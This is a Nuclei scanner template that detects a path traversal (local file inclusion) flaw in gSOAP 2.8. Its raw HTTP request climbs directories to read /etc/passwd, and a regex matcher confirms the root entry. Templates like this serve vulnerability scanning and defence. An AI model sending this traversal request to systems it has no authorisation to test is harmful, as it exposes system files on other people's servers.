nuclei-templates/vulnerabilities/other/gsoap-lfi.yaml

37 lines
897 B
YAML

id: gsoap-lfi
info:
name: gSOAP 2.8 - Local File Inclusion
author: 0x_Akoko
description: gSOAP 2.8 is vulnerable to local file inclusion.
severity: high
reference:
- https://www.exploit-db.com/exploits/47653
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: edb,gsoap,lfi
requests:
- raw:
- |
GET /../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/07/27